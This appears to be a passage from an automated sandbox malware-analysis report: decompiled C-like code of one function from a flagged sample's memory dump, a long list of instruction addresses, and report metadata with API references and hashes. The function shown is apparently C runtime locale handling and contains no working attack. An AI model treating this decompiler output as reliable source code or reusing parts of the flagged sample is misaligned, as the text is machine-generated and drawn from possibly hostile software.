							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457488);
							_push( *_t370);
							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457374) {
								goto L2;
							} else {
								if(_v12 != 0) {
									L0043EE85(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0x7df2b874
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43c9d0
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = L00447F17(_t444, 0x457480);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457344;
													_v460 = 1;
													do {
														_t266 = L00447EDD( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457374;
													} while (_t362 <= 0x457374);
													_t359 = _v472 + 2;
													_t267 = L00447E8D(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043629A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_v556 =  *0x46a00c ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = L00440972(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t450 = _t364 + 2 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = L0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_v744 =  *(_t432 + 0xa0 + _t364 * 4);
																				_v748 =  *(_t432 + 8);
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043629A();
																					asm("int3");
																					return  *0x46b508;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = L0043CAB6(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							__eflags =  *(_t432 + 8) -  *_t403;
																							if( *(_t432 + 8) ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *(_t432 + 8), 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								 *_t457 =  *(_t432 + 8);
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					 *0x45346c(_t432);
																					_t299 =  *((intOrPtr*)( *((intOrPtr*)(0x457340 + _t364 * 0xc))))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								L0043EE85( *((intOrPtr*)(_t432 + 0x28 + _t456 * 8)));
																								L0043EE85( *((intOrPtr*)(_t432 + 0x24 + _t456 * 8)));
																								L0043EE85( *(_t432 + 0xa0 + _t364 * 4));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						L0043EE85( *(_t432 + 0xa0 + _t364 * 4));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						L0043EE85(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return L0042F61B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	L0042F74F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return L0042F61B(_v12 ^ _t463);
					}
				}
				L130:
			}



































































































































                              0x0043d1e1
                              0x0043d1e4
                              0x0043d1e6
                              0x0043d1e9
                              0x0043d1ea
                              0x0043d1f3
                              0x0043d1fb
                              0x0043d1fd
                              0x0043d1ff
                              0x0043d202
                              0x0043d31b
                              0x0043d320
                              0x0043d208
                              0x0043d208
                              0x0043d209
                              0x0043d209
                              0x0043d20c
                              0x0043d20f
                              0x0043d211
                              0x0043d214
                              0x0043d214
                              0x0043d217
                              0x0043d219
                              0x0043d21c
                              0x0043d221
                              0x0043d22f
                              0x0043d239
                              0x0043d23c
                              0x0043d23f
                              0x0043d23f
                              0x0043d24a
                              0x0043d24f
                              0x0043d254
                              0x00000000
                              0x0043d25a
                              0x0043d25d
                              0x0043d25d
                              0x0043d260
                              0x0043d262
                              0x0043d265
                              0x0043d265
                              0x0043d265
                              0x0043d267
                              0x0043d267
                              0x0043d267
                              0x0043d26d
                              0x00000000
                              0x00000000
                              0x0043d272
                              0x0043d289
                              0x0043d289
                              0x0043d274
                              0x0043d274
                              0x0043d27c
                              0x00000000
                              0x0043d27e
                              0x0043d27e
                              0x0043d281
                              0x0043d287
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d287
                              0x0043d27c
                              0x0043d292
                              0x0043d297
                              0x0043d299
                              0x0043d29e
                              0x0043d2a1
                              0x0043d2a4
                              0x0043d2a7
                              0x0043d2aa
                              0x0043d2ac
                              0x0043d2b1
                              0x0043d2bb
                              0x0043d2c3
                              0x0043d2cb
                              0x00000000
                              0x0043d2d1
                              0x0043d2d5
                              0x0043d322
                              0x0043d328
                              0x0043d32b
                              0x0043d32e
                              0x0043d330
                              0x0043d334
                              0x0043d338
                              0x0043d33a
                              0x0043d33d
                              0x0043d342
                              0x0043d338
                              0x0043d343
                              0x0043d346
                              0x0043d348
                              0x0043d34a
                              0x0043d34e
                              0x0043d34f
                              0x0043d351
                              0x0043d354
                              0x0043d359
                              0x0043d34f
                              0x0043d35c
                              0x0043d35f
                              0x0043d362
                              0x0043d365
                              0x0043d368
                              0x0043d368
                              0x0043d2d7
                              0x0043d2d7
                              0x0043d2da
                              0x0043d2dd
                              0x0043d2df
                              0x0043d2e3
                              0x0043d2e7
                              0x0043d2e9
                              0x0043d2ec
                              0x0043d2f1
                              0x0043d2e7
                              0x0043d2f2
                              0x0043d2f7
                              0x0043d2f9
                              0x0043d2fe
                              0x0043d300
                              0x0043d303
                              0x0043d308
                              0x0043d2fe
                              0x0043d309
                              0x0043d30d
                              0x0043d30d
                              0x0043d310
                              0x0043d314
                              0x0043d317
                              0x0043d317
                              0x00000000
                              0x0043d31a
                              0x00000000
                              0x0043d2cb
                              0x0043d28d
                              0x0043d28f
                              0x0043d28f
                              0x00000000
                              0x0043d28f
                              0x0043d36f
                              0x0043d370
                              0x0043d371
                              0x0043d372
                              0x0043d373
                              0x0043d374
                              0x0043d379
                              0x0043d37c
                              0x0043d37d
                              0x0043d37f
                              0x0043d385
                              0x0043d38c
                              0x0043d38f
                              0x0043d392
                              0x0043d393
                              0x0043d394
                              0x0043d397
                              0x0043d398
                              0x0043d39b
                              0x0043d3a1
                              0x0043d3a3
                              0x0043d3c8
                              0x0043d3d2
                              0x0043d3d8
                              0x0043d3da
                              0x0043d3e0
                              0x0043d3e2
                              0x0043d635
                              0x0043d636
                              0x00000000
                              0x0043d3e8
                              0x0043d3e8
                              0x0043d3ec
                              0x0043d553
                              0x0043d553
                              0x0043d56a
                              0x0043d56f
                              0x0043d572
                              0x0043d574
                              0x0043d57a
                              0x0043d57a
                              0x0043d57c
                              0x0043d57c
                              0x0043d57f
                              0x0043d581
                              0x0043d587
                              0x0043d587
                              0x0043d589
                              0x0043d610
                              0x0043d610
                              0x0043d58f
                              0x0043d58f
                              0x0043d591
                              0x0043d597
                              0x0043d59a
                              0x0043d59d
                              0x0043d5a3
                              0x00000000
                              0x00000000
                              0x0043d5a5
                              0x0043d5a9
                              0x0043d5d2
                              0x0043d5d2
                              0x0043d5d4
                              0x0043d5ab
                              0x0043d5ab
                              0x0043d5af
                              0x0043d5b3
                              0x0043d5ba
                              0x0043d5c0
                              0x00000000
                              0x0043d5c2
                              0x0043d5c2
                              0x0043d5c5
                              0x0043d5c8
                              0x0043d5d0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d5d0
                              0x0043d5c0
                              0x0043d5df
                              0x0043d5df
                              0x0043d5e1
                              0x0043d60f
                              0x0043d60f
                              0x00000000
                              0x0043d5e3
                              0x0043d5e3
                              0x0043d5e9
                              0x0043d5ea
                              0x0043d5eb
                              0x0043d5ec
                              0x0043d5f1
                              0x0043d5f7
                              0x0043d5fa
                              0x0043d5fc
                              0x0043d603
                              0x0043d605
                              0x0043d607
                              0x0043d5fe
                              0x0043d5fe
                              0x0043d5ff
                              0x00000000
                              0x0043d5ff
                              0x0043d5fc
                              0x00000000
                              0x0043d5e1
                              0x0043d5d8
                              0x0043d5da
                              0x0043d5dd
                              0x0043d5dd
                              0x00000000
                              0x0043d5dd
                              0x0043d616
                              0x0043d616
                              0x0043d617
                              0x0043d61a
                              0x0043d620
                              0x0043d620
                              0x0043d629
                              0x0043d62b
                              0x00000000
                              0x0043d62d
                              0x0043d62d
                              0x00000000
                              0x0043d62d
                              0x0043d62b
                              0x00000000
                              0x0043d3f2
                              0x0043d3f2
                              0x0043d3f7
                              0x00000000
                              0x0043d3fd
                              0x0043d3fd
                              0x0043d402
                              0x00000000
                              0x0043d408
                              0x0043d408
                              0x0043d40e
                              0x0043d413
                              0x0043d415
                              0x0043d41c
                              0x0043d41d
                              0x0043d41f
                              0x00000000
                              0x00000000
                              0x0043d425
                              0x0043d425
                              0x0043d429
                              0x0043d42f
                              0x00000000
                              0x0043d435
                              0x0043d437
                              0x0043d438
                              0x0043d43b
                              0x00000000
                              0x0043d441
                              0x0043d441
                              0x0043d447
                              0x0043d44c
                              0x0043d456
                              0x0043d45a
                              0x0043d45f
                              0x0043d462
                              0x0043d464
                              0x00000000
                              0x0043d466
                              0x0043d466
                              0x0043d468
                              0x0043d46b
                              0x0043d46b
                              0x0043d46e
                              0x0043d471
                              0x0043d471
                              0x0043d47c
                              0x0043d47e
                              0x0043d480
                              0x00000000
                              0x00000000
                              0x0043d480
                              0x00000000
                              0x0043d482
                              0x0043d482
                              0x0043d488
                              0x0043d48b
                              0x0043d48b
                              0x0043d499
                              0x0043d4a2
                              0x0043d4a7
                              0x0043d4ad
                              0x0043d4b0
                              0x0043d4b1
                              0x0043d4b3
                              0x0043d4c1
                              0x0043d4c1
                              0x0043d4c8
                              0x0043d529
                              0x00000000
                              0x0043d4ca
                              0x0043d4ca
                              0x0043d4d8
                              0x0043d4dd
                              0x0043d4e0
                              0x0043d4e2
                              0x0043d652
                              0x0043d654
                              0x0043d655
                              0x0043d656
                              0x0043d657
                              0x0043d658
                              0x0043d659
                              0x0043d65e
                              0x0043d661
                              0x0043d662
                              0x0043d671
                              0x0043d674
                              0x0043d675
                              0x0043d678
                              0x0043d67c
                              0x0043d67d
                              0x0043d680
                              0x0043d690
                              0x0043d69c
                              0x0043d6b3
                              0x0043d6b8
                              0x0043d6bb
                              0x0043d6bd
                              0x0043d6d5
                              0x0043d6d5
                              0x0043d6d8
                              0x0043d6de
                              0x0043d6e7
                              0x0043d6e9
                              0x0043d6ec
                              0x0043d6f3
                              0x0043d6f6
                              0x0043d6fc
                              0x00000000
                              0x00000000
                              0x0043d6fe
                              0x0043d702
                              0x0043d72b
                              0x0043d72b
                              0x0043d704
                              0x0043d704
                              0x0043d708
                              0x0043d70c
                              0x0043d713
                              0x0043d719
                              0x00000000
                              0x0043d71b
                              0x0043d71b
                              0x0043d71e
                              0x0043d721
                              0x0043d729
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d729
                              0x0043d719
                              0x0043d738
                              0x0043d738
                              0x0043d73a
                              0x0043d740
                              0x0043d746
                              0x0043d749
                              0x0043d749
                              0x0043d74c
                              0x0043d74f
                              0x0043d74f
                              0x0043d75f
                              0x0043d76d
                              0x0043d772
                              0x0043d779
                              0x0043d77b
                              0x00000000
                              0x0043d781
                              0x0043d787
                              0x0043d794
                              0x0043d79d
                              0x0043d7a3
                              0x0043d7b0
                              0x0043d7b7
                              0x0043d7bc
                              0x0043d7bf
                              0x0043d7c1
                              0x0043da1a
                              0x0043da20
                              0x0043da21
                              0x0043da22
                              0x0043da23
                              0x0043da24
                              0x0043da25
                              0x0043da2a
                              0x0043da30
                              0x0043d7c7
                              0x0043d7c7
                              0x0043d7d5
                              0x0043d7d8
                              0x0043d7f3
                              0x0043d7fa
                              0x0043d800
                              0x0043d806
                              0x0043d7da
                              0x0043d7da
                              0x0043d7e2
                              0x00000000
                              0x0043d7e4
                              0x0043d7e4
                              0x0043d7ea
                              0x0043d7ea
                              0x0043d7e2
                              0x0043d80d
                              0x0043d810
                              0x0043d92d
                              0x0043d930
                              0x0043d93d
                              0x0043d940
                              0x0043d948
                              0x0043d948
                              0x0043d932
                              0x0043d938
                              0x0043d938
                              0x0043d816
                              0x0043d816
                              0x0043d81c
                              0x0043d824
                              0x0043d826
                              0x0043d829
                              0x0043d832
                              0x0043d83b
                              0x0043d841
                              0x0043d844
                              0x0043d846
                              0x00000000
                              0x00000000
                              0x0043d848
                              0x0043d84e
                              0x0043d84f
                              0x0043d85a
                              0x0043d862
                              0x0043d86a
                              0x0043d86d
                              0x0043d870
                              0x0043d876
                              0x0043d87c
                              0x0043d882
                              0x0043d888
                              0x0043d88b
                              0x00000000
                              0x00000000
                              0x0043d88d
                              0x0043d8b2
                              0x0043d8b2
                              0x0043d8b5
                              0x0043d8d2
                              0x0043d8d7
                              0x0043d8da
                              0x0043d8dc
                              0x0043d8e2
                              0x0043d91d
                              0x0043d8e4
                              0x0043d8e4
                              0x0043d8e9
                              0x0043d8f1
                              0x0043d8f2
                              0x0043d8f2
                              0x0043d909
                              0x0043d910
                              0x0043d913
                              0x0043d918
                              0x0043d918
                              0x0043d923
                              0x0043d923
                              0x0043d928
                              0x00000000
                              0x0043d928
                              0x0043d88f
                              0x0043d891
                              0x0043d896
                              0x0043d89c
                              0x0043d8a5
                              0x0043d8ae
                              0x0043d8ae
                              0x00000000
                              0x0043d891
                              0x0043d94b
                              0x0043d957
                              0x0043d95d
                              0x0043d960
                              0x0043d966
                              0x0043d968
                              0x0043d9a8
                              0x0043d9ae
                              0x0043d9b5
                              0x0043d9b5
                              0x0043d9bb
                              0x0043d9bf
                              0x00000000
                              0x0043d9c1
                              0x0043d9c5
                              0x0043d9ce
                              0x0043d9da
                              0x0043d9e8
                              0x0043d9ee
                              0x0043d9f1
                              0x0043d9f1
                              0x0043d9bf
                              0x0043da00
                              0x0043da08
                              0x0043da11
                              0x0043d96a
                              0x0043d970
                              0x0043d97a
                              0x0043d98c
                              0x0043d993
                              0x0043d9a0
                              0x00000000
                              0x0043d9a0
                              0x00000000
                              0x0043d968
                              0x0043d7c1
                              0x0043d73c
                              0x00000000
                              0x0043d73c
                              0x00000000
                              0x0043d73a
                              0x0043d733
                              0x0043d735
                              0x0043d735
                              0x00000000
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6bf
                              0x0043d6c1
                              0x0043d6c6
                              0x0043d6d1
                              0x0043d6d1
                              0x0043d4e8
                              0x0043d4e8
                              0x0043d4eb
                              0x0043d4f0
                              0x0043d64d
                              0x00000000
                              0x0043d4f6
                              0x0043d4f8
                              0x0043d500
                              0x0043d506
                              0x0043d507
                              0x0043d50d
                              0x0043d50e
                              0x0043d513
                              0x0043d516
                              0x0043d518
                              0x0043d51e
                              0x0043d520
                              0x0043d521
                              0x0043d521
                              0x0043d52f
                              0x0043d52f
                              0x0043d532
                              0x0043d534
                              0x0043d537
                              0x0043d545
                              0x0043d545
                              0x0043d62f
                              0x0043d62f
                              0x00000000
                              0x0043d631
                              0x0043d631
                              0x00000000
                              0x0043d539
                              0x0043d539
                              0x0043d53c
                              0x0043d53f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d53f
                              0x0043d537
                              0x0043d4f0
                              0x0043d4e2
                              0x0043d4b5
                              0x0043d4b7
                              0x0043d4b8
                              0x0043d4bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043d4bb
                              0x0043d4b3
                              0x0043d43b
                              0x00000000
                              0x0043d42f
                              0x00000000
                              0x0043d54c
                              0x0043d402
                              0x0043d3f7
                              0x0043d3ec
                              0x0043d3a5
                              0x0043d3a5
                              0x0043d3a7
                              0x0043d3a9
                              0x0043d3aa
                              0x0043d3ab
                              0x0043d3ac
                              0x0043d3b1
                              0x0043d63c
                              0x0043d641
                              0x0043d64c
                              0x0043d64c
                              0x0043d3a3
                              0x00000000

                              APIs
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • _free.LIBCMT ref: 0043D2EC
                              • _free.LIBCMT ref: 0043D303
                              • _free.LIBCMT ref: 0043D322
                              • _free.LIBCMT ref: 0043D33D
                              • _free.LIBCMT ref: 0043D354
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$AllocHeap
                              • String ID: sE
                              • API String ID: 1835388192-3868527542
                              • Opcode ID: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
                              • Opcode Fuzzy Hash: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
                              • Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49
                              Uniqueness

                              Uniqueness Score: -1.00%

